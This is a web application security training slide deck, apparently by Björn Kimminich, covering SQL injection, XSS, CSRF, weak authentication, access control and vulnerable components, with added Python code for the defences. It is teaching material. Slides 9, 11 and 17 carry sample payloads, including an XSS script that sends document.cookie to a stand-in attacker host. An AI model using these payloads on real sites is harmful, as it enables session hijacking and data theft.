Web Application Security in a nutshell

>>> View this presentation online at http://webappsec-nutshell.kimminich.de/ <<<

An ultra-compact intro (or refresher) to Web Application Security derived from my Web Application Security Training Workshop (http://de.slideshare.net/BjrnKimminich/web-application-security-21684264).

Published in: Technology


  1. WEB APPLICATION SECURITY IN A NUTSHELL
     An ultra-compact intro (or refresher) to Web Application Security. Created by Björn Kimminich / @bkimminich
  2. BJÖRN KIMMINICH
     Application Security Officer at Kuehne + Nagel (AG & Co.) KG
     Author of open-source pentest training webapp juice-shop
     OWASP member and OWASP Zed Attack Proxy contributor
  3. FAMOUS LAST WORDS...
     “Nobody would bother to hack us.”
     “Our Firewall, IDS and IPS will keep us safe.”
     “We will add security to the system later.”
     “What's the worst that could actually happen?”
  4. INJECTION
  5. INJECTION MEANS... ...tricking an application into including unintended commands in the data sent to an interpreter.
  6. INTERPRETER MEANS... ...a program that takes a String and interprets it as a command.
  7. INTERPRETERS ARE USED FOR... SQL, HQL, OS Shell, LDAP, XPath, ...
  8. BYPASSING AUTHENTICATION WITH SQL INJECTION
       String query = "SELECT id FROM users "
                    + "WHERE name = '" + req.getParameter("username") + "' "
                    + "AND password = '" + req.getParameter("password") + "'";
     The intended use case results in a query like this:
       SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
  9. ATTACK EXAMPLES ON AUTHENTICATION QUERIES
     Disabling password check for a known username:
       SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'
     Logging in without even knowing a username:
       SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'
  10. SPYING OUT DATA WITH SQL INJECTION
       String query = "SELECT id,author,title,price FROM books "
                    + "WHERE title LIKE '%" + req.getParameter("query") + "%'";
     The intended use case results in a query like this:
       SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
  11. ATTACK EXAMPLES ON DATA RETRIEVAL QUERIES
     Probing for the right number of result set columns:
       SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users--%'
       SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users--%'
       SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users--%'
     Using known column names to extract data:
       SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users--%'
  12. PREVENTING INJECTION
     Avoid Interpreters
     Bind Variables
     Prepared Statements
     Least Privileges for app DB user
     White List Input Validation
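The following is an added example, not code from the slides: it puts the concatenated authentication query from slide 8 next to the same query with bind variables, runs both against a constructed in-memory SQLite table (the `users` table, its rows and the `USERNAME_RE` white list are assumptions for this demo), and lets you see that the comment-based payloads from slide 9 only work against the concatenated version.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slides' users table (example data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    # Plaintext passwords only to keep the injection demo minimal;
    # a real system stores salted hashes (see the broken authentication slides).
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("bjoern", "secret"), ("admin", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation, the pattern shown on slide 8.
    Returns the matched user id or None. Quotes and '--' in the input become SQL."""
    query = ("SELECT id FROM users WHERE name = '" + username + "' "
             "AND password = '" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same query with bind variables (a prepared statement in JDBC terms).
    The values travel separately from the SQL text, so a quote or comment
    marker inside them is compared as data and never parsed as SQL."""
    row = conn.execute("SELECT id FROM users WHERE name = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


# White list input validation: only characters a username legitimately needs.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def is_valid_username(username):
    """Reject anything outside the allowed alphabet before it reaches the interpreter."""
    return USERNAME_RE.fullmatch(username) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload from slide 9:", login_vulnerable(db, "bjoern'--", "?"))
    print("bind variables, same payload:   ", login_safe(db, "bjoern'--", "?"))
    print("white list accepts payload?     ", is_valid_username("bjoern'--"))
```

Bind variables are the fix that works on their own; the white list is defence in depth and also stops the `' or 1=1--` case at the input layer, before any query is built.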
  13. CROSS SITE SCRIPTING (XSS)
  14. MALICIOUS CODE IS SENT... ...to an innocent user's browser through
     a form field or URL (Reflected XSS)
     a previously stored DB record (Persistent XSS)
     a DOM element of a rich JS client (Local XSS)
  15. POSSIBLE DAMAGE FROM XSS
     stolen user session
     stolen sensitive data
     rewriting web page
     redirecting to malicious site
  16. XSS VULNERABILITY EXAMPLE
       http://bookwo.rm/titles/search?keywords=raspberry%20pi
     The intended use case is to display the keywords above the results:
       <%
         String keywords = request.getParameter("keywords");
         List<Book> results = titleSearchService.findByKeywords(keywords.split(" "));
       %>
       There are <%=results.size()%> results for your search by <em><%=keywords%></em>
       <table>
       <% for (Book book : results) { %>
         <%-- render result as table rows --%>
       <% } %>
       </table>
  17. XSS ATTACK EXAMPLES
     Probing for XSS Vulnerability
       <script>alert(1)</script>
     Stealing User Session
       <script>new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie);</script>
     Site Defacement
       <script>document.body.background="http://my.evil-si.te/image.jpg";</script>
  18. PREVENTING XSS
     Do not unnecessarily include user supplied input in output
     Output encode all user supplied input
     Sanitize HTML where user supplied HTML is unavoidable
     White List Input Validation
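An added example (not part of the slides) that reproduces the search-results line from slide 16 in Python and shows the two preventions that apply to it: output encoding of the keywords, and white list validation of the `keywords` parameter. The `KEYWORD_RE` alphabet and the rendering functions are assumptions for this demo; the probe string is the one from slide 17.

```python
import html
import re


def render_vulnerable(keywords, count):
    """Mirrors the JSP on slide 16: the raw parameter is pasted into the HTML,
    so a <script> tag in it becomes part of the page."""
    return f"There are {count} results for your search by <em>{keywords}</em>"


def render_encoded(keywords, count):
    """Output encoding for an HTML body context: every character with HTML
    meaning (<, >, &, quotes) is turned into an entity, so the browser
    displays the keywords as text instead of executing them."""
    return (f"There are {count} results for your search by "
            f"<em>{html.escape(keywords, quote=True)}</em>")


# White list: letters, digits and spaces only, which is all a book title search needs.
KEYWORD_RE = re.compile(r"[A-Za-z0-9 ]{1,64}")


def is_valid_keywords(keywords):
    """White list input validation: anything outside the allowed alphabet is rejected
    before it is ever echoed back."""
    return KEYWORD_RE.fullmatch(keywords) is not None


def search_page(keywords, count):
    """Combined handler: validate first, then encode whatever is reflected."""
    if not is_valid_keywords(keywords):
        return "Invalid search keywords."
    return render_encoded(keywords, count)


if __name__ == "__main__":
    probe = "<script>alert(1)</script>"
    print(render_vulnerable(probe, 0))
    print(render_encoded(probe, 0))
    print(search_page("raspberry pi", 3))
```

Encoding must match the output context: `html.escape` is right for text between tags and for quoted attribute values, but a value placed inside a JavaScript block or a URL needs the encoding of that context instead.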
  19. CROSS SITE REQUEST FORGERY (CSRF)
  20. A VICTIM'S BROWSER... ...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request:
     Session Cookie
     Basic Authentication
     Authorization HTTP Header
     ...
  21. CSRF ATTACK EXAMPLES
  22. PREVENTING CSRF
     Add a secret token to all sensitive requests
     This token must not be automatically submitted
     Require secondary authentication for sensitive functions
     Beware exposing the token in a Referer HTTP header
     Make sure your application has no XSS holes that could be exploited to attack others!
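An added example (not from the slides) of the first two points above: a secret token bound to the session with an HMAC, and a request handler that refuses sensitive requests carrying the session cookie but not the token. The request is modelled as a plain dict with `cookies` and `form` keys, the cookie name `JSESSIONID` and the `SERVER_SECRET` are assumptions for this demo.

```python
import hashlib
import hmac
import secrets

# Per-deployment key (generated here for the demo; in production it is loaded from config).
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Derive the token from the session id, so a token from another session is useless
    and the server needs no extra storage. Embed it in the form as a hidden field."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(session_id, submitted_token):
    """True only if the token from the request body matches the one for this session.
    The browser never adds this field by itself, which is exactly what defeats CSRF."""
    if not submitted_token:
        return False
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, submitted_token)


def handle_sensitive_post(request):
    """Constructed stand-in for a servlet handling e.g. a money transfer.
    request = {"cookies": {...}, "form": {...}}; returns an HTTP-style status line."""
    session_id = request["cookies"].get("JSESSIONID")
    if not session_id:
        return "401 no session"
    if not is_request_allowed(session_id, request["form"].get("csrf_token")):
        return "403 csrf token missing or invalid"
    return "200 ok"


if __name__ == "__main__":
    sid = "constructed-session-id"
    # Forged request: the browser attaches the cookie automatically, but the attacker's
    # page cannot read the token, so the form arrives without it.
    forged = {"cookies": {"JSESSIONID": sid}, "form": {"amount": "1000"}}
    legit = {"cookies": {"JSESSIONID": sid},
             "form": {"amount": "1000", "csrf_token": issue_csrf_token(sid)}}
    print(handle_sensitive_post(forged))
    print(handle_sensitive_post(legit))
```

The token is sent in the request body, not in the URL, which addresses the Referer point above; and because the token is only as secret as the page that contains it, the last bullet (no XSS holes) remains a precondition.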
  23. BROKEN AUTHENTICATION
  24. TYPICAL AUTHENTICATION FLAWS
     Allowing weak passwords
     Storing SSL certificate insecurely
     Credentials passed via insecure http connection
     Exposing session ids in URLs, via unencrypted network, logs, ...
  25. SIDE CHANNEL ATTACK VECTORS
     Change Password
     “Remember me”
     Forgot Password
     Secret Questions
     Make sure your application does not store credentials in its database unencrypted!
  26. CLASSICAL BROKEN AUTHENTICATION... ...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE
       http://sick-cure-ba.nk/login.do

       POST /login.do HTTP/1.1
       Host: sick-cure-ba.nk
       Cache-Control: no-cache
       Content-Type: application/x-www-form-urlencoded

       username=bjoern&password=secret
  27. WEAK HASHES PUT PASSWORDS AT RISK... ...AS DO UNSALTED STRONG HASH ALGORITHMS
       id  username    password
       1   admin       d033e22ae348aeb5660fc2140aec35850c4da997
       2   bjoern      2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b
       3   localhorst  0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe464e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006
     Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512 bit length. You can even crack password hashes online, e.g. at CrackStation or via a tweet to @PlzCrack.
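The slide above says what not to do; this added example (not from the slides) shows the property a salted, slow hash gives you. An unsalted hash is the same for every user with the same password, which is what makes a precomputed table work once for all of them; with a random per-user salt and a deliberately slow derivation (PBKDF2-HMAC-SHA256 here, with an assumed iteration count) two users with the same password get different stored values and each guess costs the attacker a full derivation.

```python
import hashlib
import hmac
import os

# Assumption for the demo: tune to your hardware so one login costs a noticeable fraction
# of a second. Higher is better for you and worse for anyone guessing offline.
ITERATIONS = 200_000


def unsalted_sha256(password):
    """The pattern the slide warns about: same password, same hash, for every user."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password, salt=None):
    """Return 'salt_hex$digest_hex'. A fresh 16-byte random salt per user means
    identical passwords no longer share a stored value, so no table can be precomputed."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    # Two constructed users who happen to pick the same password.
    print("unsalted:", unsalted_sha256("secret") == unsalted_sha256("secret"))
    a, b = hash_password("secret"), hash_password("secret")
    print("salted values differ:", a != b)
    print("both verify:", verify_password("secret", a) and verify_password("secret", b))
```

In a real application you would reach for a maintained library (bcrypt, scrypt or Argon2 bindings) rather than hand-rolling this, but the stored format, the per-user salt and the constant-time comparison are what any of them give you.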
  28. BROKEN ACCESS CONTROL
  29. COMMON AUTHORIZATION MISTAKES
     Hiding object references instead of restricting access
     Displaying only authorized links and menu choices
     Trusting client-side access control mechanisms
     Lack of server-side verification of user privileges
  30. REQUEST TAMPERING FOR PRIVILEGE ESCALATION... ...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES
       http://logistics-worldwi.de/showShipment?id=40643108
       http://my-universi.ty/api/students/6503/exams/view
       http://document-warehou.se/landingpage?content=index.html
  31. SECURING AUTHORIZATION
     Never rely on “Security by obscurity”
     Replace direct object references with temporary mappings
     Restrict data and functionality access to authorized users
     Enforce user or role based permissions
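An added example (not from the slides) that implements the second and third points above for the `showShipment?id=...` case from slide 30: the real shipment id is never exposed, the user gets a random per-session handle instead, and resolving the handle re-checks ownership on the server. The `ShipmentAccess` class and its ownership table are assumptions for this demo; the id 40643108 is the one from the slide.

```python
import secrets


class ShipmentAccess:
    """Indirect object references plus server-side authorization.

    owners: real shipment id -> user allowed to see it (constructed stand-in
    for the application's own data model)."""

    def __init__(self, owners):
        self.owners = owners
        # (user, handle) -> real id. Keyed by user, so one user's handle is
        # meaningless in another user's session.
        self.handles = {}

    def expose(self, user, real_id):
        """Return a temporary handle to put in the URL, or None if the user
        is not allowed to see this shipment in the first place."""
        if self.owners.get(real_id) != user:
            return None
        handle = secrets.token_urlsafe(16)
        self.handles[(user, handle)] = real_id
        return handle

    def resolve(self, user, handle):
        """Map a handle from the request back to the real id, enforcing the
        permission check again. A tampered or foreign handle resolves to None."""
        real_id = self.handles.get((user, handle))
        if real_id is None or self.owners.get(real_id) != user:
            return None
        return real_id


def show_shipment(access, user, handle):
    """Constructed request handler for /showShipment?id=<handle>."""
    real_id = access.resolve(user, handle)
    if real_id is None:
        return "403 Forbidden"
    return f"200 shipment {real_id}"


if __name__ == "__main__":
    access = ShipmentAccess({40643108: "alice", 40643109: "bob"})
    h = access.expose("alice", 40643108)
    print("alice, own handle:  ", show_shipment(access, "alice", h))
    print("bob, alice's handle:", show_shipment(access, "bob", h))
    print("alice, guessed id:  ", show_shipment(access, "alice", "40643109"))
```

The handle only hides the id; the ownership check in `resolve` is what actually restricts access. Keeping both, and never skipping the second because the first exists, is the point of the first bullet above.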
  32. BROKEN ENVIRONMENT
  33. POSSIBLE ENVIRONMENTAL VULNERABILITIES
     Software Libraries
     Application Server
     Web Server
     Operating System
     ...
  34. KNOWN VULNERABILITY EXAMPLES
     Component: OpenSSL
     Vulnerability: Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read (Heartbleed)
     Affected: 1.0.1 - 1.0.1f, 1.0.2-beta, 1.0.2-beta1

     Component: Unix Bash
     Vulnerability: Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system (Shellshock)
     Affected: CGI, OpenSSH, DHCP, QMail, ...

     Component: Struts
     Vulnerability: Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method
     Affected: before 2.3.16.1

     Component: Struts
     Vulnerability: Wildcard cookiesName does not properly restrict access to the getClass() method, which allows ClassLoader manipulation
     Affected: before 2.3.16.2
  35. PROTECTION FROM ENVIRONMENTAL VULNERABILITIES
     Monitor security of used components
     Keep up with patches for used components
     Remove unnecessary stuff on all levels
     Restrict use of unapproved components
     Java and .NET project dependencies can be monitored by OWASP Dependency Check, which relies on the NIST National Vulnerability Database. For Javascript and Node.js modules there is Retire.js, which is updated manually via its GitHub project. Both tools integrate well with typical software build processes.
  36. Q&A
  37. CREDITS
     Presentation created with reveal.js - The HTML Presentation Framework
     Based on free material provided by OWASP - The Open Web Application Security Project
     Background image based on Digital Shodan by sephiroth-kmfdm
  38. THE END BY BJÖRN KIMMINICH / KIMMINICH.DE These slides are publicly available on GitHub and Slideshare.
